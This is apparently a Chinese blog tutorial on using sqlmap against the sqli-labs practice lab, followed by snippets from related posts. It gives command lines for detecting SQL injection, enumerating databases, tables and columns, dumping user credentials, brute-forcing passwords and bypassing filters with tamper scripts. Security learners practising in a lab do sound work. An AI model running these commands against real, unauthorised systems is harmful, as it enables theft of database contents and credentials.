Sqlmap在sqli-lab上的一些使用

最新推荐文章于 2025-05-10 09:41:06 发布
最新推荐文章于 2025-05-10 09:41:06 发布
阅读量1.4k 收藏 14
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 笔记
原文链接:https://blog.youkuaiyun.com/xmd213131/article/details/105919380
本文详细介绍了SQL注入工具SQLMap的使用方法,包括GET、POST请求的注入,Header注入,指定注入位置,盲注,多线程设置,预测输出,持久连接,数据库探测,脚本绕过,无效值替换,自定义载荷位置,tamper脚本,注入技术选择,权限枚举,URL爬取等核心功能。通过实例展示了SQLMap在渗透测试中的强大功能。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

1.get使用方法:
2.post使用方法:
3.header注入使用方法:
4.指定注入的位置:
5.盲注使用不接收http body:
6.设置多线程(可以设置的最大数量为10,默认为1):
7.预测输出:
8.持久连接:
9.指定数据库的探测
10.sqlmap脚本绕过(详细的脚本解释)
11.强制设置无效值替换:
12.自定义载荷(payload)位置
13.sqlmay设置tamper脚本:
14.sqlmap设置具体的注入技术:
15.查看当前用户以及是否是dba用户
16.枚举dbms的权限
17.爬取url:

1.get使用方法:

1.查看是否有注入点:sqlmap -u 网址
在这里插入图片描述

2.爆出数据库名:sqlmap -u 网址 --dbs
在这里插入图片描述
3.爆出数据库的表名:sqlmap -u 网址 -D security --tables
在这里插入图片描述

4.爆出数据库的列名:sqlmap -u 网址 -D security -T users --columns
在这里插入图片描述

5.dump出数据:sqlmap -u -D security -T users -C id,password,username --dump
在这里插入图片描述

2.post使用方法:

1.使用burp抓包,将请求内容保存在txt文件中(或者使用-u 网址 --data ‘data’来代替)
在这里插入图片描述

2.使用sqlmap检查是否存在注入点:sqlmap -r 文档位置
在这里插入图片描述
3.使用sqlmap爆库名:sqlmap -r 文档位置 --dbs
在这里插入图片描述
其余步骤与get方式一样

3.header注入使用方法:

当我们使用–level 3时就会检查UA,referer是否存在注入,而level 2则会检测cookie
1.查看是否存在注入点:sqlmap -r 文档位置 --dbms=security --level3
在这里插入图片描述
2.查看数据库:sqlmap -r 文档位置 --dbs
在这里插入图片描述
其他的与get也是一样的

4.指定注入的位置:

在我们要指定注入的位置后面加上即可,例如:
在这里插入图片描述
然后sqlmap运行的时候就会探测到我们的号:
在这里插入图片描述
可以看到,这里就只探测了cookie:
在这里插入图片描述

5.盲注使用不接收http body:

sqlmap -u 网址 --null-connection,这样sqlmap会以head的方式发送探测请求
在这里插入图片描述

6.设置多线程(可以设置的最大数量为10,默认为1):

在我们之前的参数后面加上 --threads 10就可以了,但是在时间盲注中使用多线程是不安全的,所以尽量不要在时间盲注使用多线程:
在这里插入图片描述
使用10个线程:
开始时间:
在这里插入图片描述
结束时间:
在这里插入图片描述
花了大概5分钟

使用默认线程数量:
开始时间:
在这里插入图片描述
结束时间:
在这里插入图片描述
还没有跑完,可以看到速度的差距有多大了

7.预测输出:

–predict-output
该方法可以提升性能,但不与–threads兼容
使用预测输出:
开始时间:
在这里插入图片描述
结束时间:
在这里插入图片描述
可以看到跟默认的爆破到同样的地方时间少了两分钟,说明还是有效果的,但是没有–threads 10快

8.持久连接:

–keep-alive
该方法也可以提升性能
使用持久连接:
开始时间:
在这里插入图片描述
结束时间:
在这里插入图片描述
感觉跟默认的差距不大。。。。

9.指定数据库的探测

–dbms 数据库名
这样可以节约时间

10.sqlmap脚本绕过

以sqli-labs-less36为例:
不使用脚本:
在这里插入图片描述
可以看到无法检测出注入点

使用脚本:(unmagicquotes.py,用%df%27代替单引号,用–代替空格)

在这里插入图片描述
可以看到检测出注入点了

11.强制设置无效值替换:

有时候我们需要使原始的参数无效时,sqlmap默认使用负数来替换原始值,而这里我们还可以使用:

–invalid-bignum 用大数字替换原始值(id=1999999999)

–invalid-logical 用布尔运算替换原始值(id=1 and 1=2)

–invalid-string 用随机字符串替换原始值(id=asdsa)

12.自定义载荷(payload)位置

一般是不会用到的,让sqlmap自己去插入就行了
如果使用这个的话需要加上前缀和后缀:

–prefix="’)" --suffix=" and ('1"

而我们插入的payload就会在这中间:

13.sqlmay设置tamper脚本:

–tamper"脚本,各个脚本之间空格隔开"

14.sqlmap设置具体的注入技术:

–technique:
B:布尔盲注
E:报错
U:联合
S:堆叠
T:时间
Q:内联查询

默认使用以上的全部技术,感觉sqlmap一般查不出来堆叠注入,可能是我还没有设置好(使用sqli-lbas-less39验证)

15.查看当前用户以及是否是dba用户

–current-user 查看用户

–is-dba 查看是否是dba

–hostname 查看主机名
在这里插入图片描述

–password暴力破解用户名密码
在这里插入图片描述

16.枚举dbms的权限

–privileges --role
在这里插入图片描述

17.爬取url:

–crawl=num(1,2,3,4:要爬取的深度)
在这里插入图片描述

版权声明:本文为优快云博主「Mccc_li」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.youkuaiyun.com/xmd213131/article/details/105919380

sqlmap sqli-labs
u012922879的博客
08-26 3473
测试靶场:http://127.0.0.1/sqli-labs-master/Less-1/?id=5 sqlmap选项 目标:至少要选中一个参数 -u URL, –url=URL 目标为 URL (例如. “http://www.site.com/vuln.php?id=1“) -g GOOGLEDORK 将谷歌dork的结果作为目标url 请求: ...
Sqlmap使用sqli-lab
Mccc_li的博客
05-06 3858
1.get使用方法: 1.查看是否有注入点:sqlmap -u 网址 2.爆出数据库名:sqlmap -u 网址 --dbs 5.爆出数据库的表名:sqlmap -u 网址 -D security --tables 6.爆出数据库的列名:sqlmap -u 网址 -D security -T users --columns 7.dump出数据:sqlmap -u -D security -...
sqlmap使用
最新发布
m0_72199724的博客
05-10 1095
sqlmap 是一款用于检测和利用 SQL 注入漏洞的强大工具。其基础命令包括设置目标 URL、定义请求参数、调整检测级别和风险级别等。用户可以通过指定参数、使用代理或 Tor 网络来增强测试的隐蔽性。进阶命令则提供了更多定制化选项,如从文件中加载目标、设置 HTTP 头部、优化性能等。sqlmap 还支持多种 SQL 注入技术,并能够枚举数据库信息、访问操作系统,甚至获取交互式 shell。通过灵活的配置和丰富的功能,sqlmap 成为渗透测试中不可或缺的工具。
【SQL注入】sqli-labs手注+sqlmap
m0_63563528的博客
07-19 2657
第一周:SQL注入学习
【SQL注入-15】自动化注入案例—以sqli-labs-less9为例(利用sqlmap工具)
m0_64378913的博客
05-12 2961
目录1 前言[09:55:46] [INFO] testing connection to the target URL [09:55:46] [INFO] checking if the target is protected by some kind of WAF/IPS [09:55:46] [INFO] testing if the target URL content is stable [09:55:47] [INFO] target URL content is stable [09:55:4
【史上最全sqlmap通关sqli-labs靶场教程】
DMXA的博客
10-15 7041
【史上最全sqlmap通关sqli-labs靶场教程】
sqlmapsqli-labs速通攻略
m0_74824002的博客
12-09 759
ps:由于sqlmap生成的payload太长,暴字段和值的时候可能会有问题,暴值的时候可以一个字段一个字段注。使用了addSlashes()函数转义,正常会想到宽字节,但是此题是数字型,非引号类型注入,因此直接注就行。注意,因为该接口本身就是会对数据做更新的,因此使用sqlmap注入会导致数据被更新,密码会变为1。本题除了过滤了and or外,空格和#也被过滤。and和or用双写绕过,空格用%a0绕过,#用。,也就是cookie的值进行了base64编码,需要使用–tamper指定base64编码处理。
sqlmap工具打sqli-labs前20关靶场
longnice666的博客
11-17 3361
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL和SQL注入漏洞。
sqlmapSQLi-LABS靶场 1-10关
小明师傅博客
06-04 8705
今天我们来用sqlmap去做SQLi-LABS靶场 首先来讲一下基础命令 1.清除sqlmap缓存: 第一个办法:在C:\Users\dragoneyes.sqlmap\output,删除output里面的内容 第二个办法:sqlmap.py --purge 2.sqlmap -u 注入点 检测注入点是否可用 sqlmap -u 注入点 –batch 自动输入 暴库 sqlmap -u 注入点 –dbs //暴库 Web当前使用的数据库 sqlmap -u 注入点 –current-db //爆当前使用的库
网络安全-sqlmap实战之sqlilabs-Less8_sqli-labs-master less-8 select from users where
2401_84254087的博客
05-02 174
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。添加–dbms参数,–technique参数。使用-o参数优化,–batch参数进行跳过。
SQL 注入:Sqli-labs (1-65通关)、sqlmap、注入常用函数
freeking101的博客
07-26 6591
SQL 注入:Sqli-labs (1-65通关)、sqlmap、注入常用函数
sqli-labssqlmap初体验
rev1ve的博客
08-07 764
为了更深入学习sqlmap,打算对sqli-labs进行SQL注入测试学习内容包括不同的请求方式和请求参数,总之写下这篇博客记录我的学习过程。
sqlmap使用教程(sqli-labs11-20)
小同的博客
05-22 882
sql-labs-less11~less17常规 POST 注入 sql-labs-less18 Header injection - Uagent sqlmap 在对user-agent 注入的时候,得在文件中的user-agent的参数后面加上 * 或者不加 * 号,调用 --level参数,将等级调至 3级,只有等级为 3级即以上时才能对 user-agent进行注入 sql-labs-less19 Header injection ...
sqlmap学习,打靶sqli-labs.(1-19)
shdbehdvd的博客
11-25 993
sqlmap学习日志.
SQL注入(七)sqli-labs SQLmap注入
shirlly_的博客
04-12 345
使用sqlmap进行sqli-labs
sqli-labs全程sqlmap通关
reasl的博客
11-24 411
sqli-labssqlmap做法—新手
sql_labs通关,手动加sqlmap
qq_47289634的博客
02-23 1327
信息收集: 数据库版本:version()数据库名字:database() 数据库用户:user() 系统:@@version_compile_os MySQL5.0以上版本自带一个information_schema数据库,储存所有的数据库名表名列名 数据库中 . (点)代表下一级 student.users 代表student数据库中的users表看我另外一篇,点击下方蓝色字体sqlmap详细使用方法id=1,id=2返回类内容不同,输入的内容是带入到数据库里面查询了。 判断类型:这里我把源代码输出了
网络安全-sqlmap实战之sqlilabs-Less5
关注网络安全、云原生安全
06-28 1392
目录 类型 -dbs枚举数据库 --tables枚举数据库表 --columns枚举列 --dump枚举数据 查看源代码 类型 单引号注入 单引号报错 猜测sql语句 select * from users where id = ('参数') LIMIT 0,1 -dbs枚举数据库 使用-o参数优化,--batch参数进行跳过,--threads参数开启更多线程 python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-5.
(手工+sqlmap)【sqli-labs1-20】基础注入
07-10 1388
【SQL】sqlmap+手工
sqlmap安装配合sqli-lab
12-31
### 安装 Sqlmap 为了能够顺利运行并测试 SQL 注入漏洞,首先需要确保已正确安装 `sqlmap` 工具。以下是针对不同操作系统环境下的安装指导: 对于基于 Debian 或 Ubuntu 的 Linux 发行版,可以通过 APT 包管理器来安装最新版本的 sqlmap: ```bash sudo apt-get update && sudo apt-get install -y git python3-pip git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev cd sqlmap-dev/ pip3 install . ``` 对于 macOS 用户,则推荐通过 Homebrew 来获取最新的稳定版本: ```bash brew tap owtf/pwn brew install sqlmap ``` Windows 用户可以考虑使用 Windows Subsystem for Linux (WSL),按照上述 Linux 方法进行安装。 ### 使用 Sqlmap 测试 Sqli-lab 实验室中的 Web 应用程序安全性 完成软件安装之后,就可以着手准备与 sqli-labs 进行交互了。这里介绍一种常见的方式——利用 Burp Suite 抓取 HTTP 请求数据包,并将其保存成文本文件供后续分析工具调用。 #### 准备工作 启动目标虚拟机上的 Apache 和 PHP 环境服务,访问浏览器输入相应 URL 地址加载页面;与此同时开启中间件代理监听端口以便捕获完整的会话流量记录[^3]。 #### 执行检测命令 一旦获得了有效的 GET/POST 请求样本,便能借助 `-r` 参数指定本地存储路径让 sqlmap 自动解析其中的关键信息字段尝试探测潜在风险点位[^1]: ```bash sqlmap -r /path/to/request.txt ``` 如果想要进一步探索数据库结构详情,比如枚举所有可用表单名称列表,只需附加额外选项即可实现自动化操作流程简化处理逻辑[^2]: ```bash python sqlmap.py -u "http://target-url/?param=value" --dbms=mysql --technique=B -o -D target_database --tables --batch ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值